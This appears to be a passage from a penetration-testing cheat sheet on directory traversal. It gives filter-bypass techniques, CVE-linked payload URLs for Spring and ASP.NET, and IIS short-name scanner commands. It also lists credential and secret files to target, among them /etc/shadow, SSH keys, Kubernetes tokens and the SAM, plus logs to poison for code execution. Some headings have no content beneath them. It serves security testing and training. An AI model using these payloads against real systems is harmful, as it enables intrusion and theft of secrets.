Directory Traversal
Path Traversal, also known as Directory Traversal, is a type of security vulnerability that occurs when an attacker manipulates variables that reference files with “dot-dot-slash (../)” sequences or similar constructs. This can allow the attacker to access arbitrary files and directories stored on the file system.
Summary
Tools
- wireghoul/dotdotpwn - The Directory Traversal Fuzzer
Methodology
We can use the .. characters to access the parent directory, the following strings are several encoding that can help you bypass a poorly implemented filter.
16 bits Unicode encoding
UTF-8 Unicode encoding
Bypass "../" replaced by ""
Sometimes you encounter a WAF which remove the ../ characters from the strings, just duplicate them.
Bypass "../" with ";"
Double URL encoding
e.g: Spring MVC Directory Traversal Vulnerability (CVE-2018-1271) with http://localhost:8080/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini
UNC Bypass
An attacker can inject a Windows UNC share ('\UNC\share\name') into a software system to potentially redirect access to an unintended location or arbitrary file.
NGINX/ALB Bypass
NGINX in certain configurations and ALB can block traversal attacks in the route, For example:
http://nginx-server/../../ will return a 400 bad request.
To bypass this behaviour just add forward slashes in front of the url:
http://nginx-server////////../../
ASP NET Cookieless Bypass
When cookieless session state is enabled. Instead of relying on a cookie to identify the session, ASP.NET modifies the URL by embedding the Session ID directly into it.
For example, a typical URL might be transformed from: http://example.com/page.aspx to something like: http://example.com/(S(lit3py55t21z5v55vlm25s55))/page.aspx. The value within (S(...)) is the Session ID.
| .NET Version | URI |
|---|---|
| V1.0, V1.1 | /(XXXXXXXX)/ |
| V2.0+ | /(S(XXXXXXXX))/ |
| V2.0+ | /(A(XXXXXXXX)F(YYYYYYYY))/ |
| V2.0+ | ... |
We can use this behavior to bypass filtered URLs.
-
If your application is in the main folder
-
If your application is in a subfolder
| CVE | Payload |
|---|---|
| CVE-2023-36899 | /WebForm/(S(X))/prot/(S(X))ected/target1.aspx |
| - | /WebForm/(S(X))/b/(S(X))in/target2.aspx |
| CVE-2023-36560 | /WebForm/pro/(S(X))tected/target1.aspx/(S(X))/ |
| - | /WebForm/b/(S(X))in/target2.aspx/(S(X))/ |
IIS Short Name
java -jar ./iis_shortname_scanner.jar 20 8 'https://X.X.X.X/bin::$INDEX_ALLOCATION/'
java -jar ./iis_shortname_scanner.jar 20 8 'https://X.X.X.X/MyApp/bin::$INDEX_ALLOCATION/'
Java Bypass
Bypass Java's URL protocol
Path Traversal
Interesting Linux files
/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/[0-9]*/fd/[0-9]* (first number is the PID, second is the filedescriptor)
/proc/self/environ
/proc/version
/proc/cmdline
/proc/sched_debug
/proc/mounts
/proc/net/arp
/proc/net/route
/proc/net/tcp
/proc/net/udp
/proc/self/cwd/index.php
/proc/self/cwd/main.py
/home/$USER/.bash_history
/home/$USER/.ssh/id_rsa
/run/secrets/kubernetes.io/serviceaccount/token
/run/secrets/kubernetes.io/serviceaccount/namespace
/run/secrets/kubernetes.io/serviceaccount/certificate
/var/run/secrets/kubernetes.io/serviceaccount
/var/lib/mlocate/mlocate.db
/var/lib/plocate/plocate.db
/var/lib/mlocate.db
Interesting Windows files
Always existing file in recent Windows machine. Ideal to test path traversal but nothing much interesting inside...
Interesting files to check out (Extracted from https://github.com/soffensive/windowsblindread)
c:/boot.ini
c:/inetpub/logs/logfiles
c:/inetpub/wwwroot/global.asa
c:/inetpub/wwwroot/index.asp
c:/inetpub/wwwroot/web.config
c:/sysprep.inf
c:/sysprep.xml
c:/sysprep/sysprep.inf
c:/sysprep/sysprep.xml
c:/system32/inetsrv/metabase.xml
c:/sysprep.inf
c:/sysprep.xml
c:/sysprep/sysprep.inf
c:/sysprep/sysprep.xml
c:/system volume information/wpsettings.dat
c:/system32/inetsrv/metabase.xml
c:/unattend.txt
c:/unattend.xml
c:/unattended.txt
c:/unattended.xml
c:/windows/repair/sam
c:/windows/repair/system
The following log files are controllable and can be included with an evil payload to achieve a command execution
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/httpd/error_log
/usr/local/apache/log/error_log
/usr/local/apache2/log/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/vsftpd.log
/var/log/sshd.log
/var/log/mail
Labs
- PortSwigger - File path traversal, simple case
- PortSwigger - File path traversal, traversal sequences blocked with absolute path bypass
- PortSwigger - File path traversal, traversal sequences stripped non-recursively
- PortSwigger - File path traversal, traversal sequences stripped with superfluous URL-decode
- PortSwigger - File path traversal, validation of start of path
- PortSwigger - File path traversal, validation of file extension with null byte bypass
References
- Path Traversal Cheat Sheet: Windows - @HollyGraceful - May 17, 2015
- Directory traversal attack - Wikipedia - 5 August 2024
- CWE-40: Path Traversal: '\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018
- NGINX may be protecting your applications from traversal attacks without you even knowing - Rotem Bar - September 24, 2020
- Directory traversal - Portswigger - March 30, 2019
- Cookieless ASPNET - Soroush Dalili - March 27, 2023
- EP 057 | Proc filesystem tricks & locatedb abuse with @remsio & @_bluesheet - TheLaluka - November 30, 2023
- Understand How the ASP.NET Cookieless Feature Works - Microsoft Documentation - June 24, 2011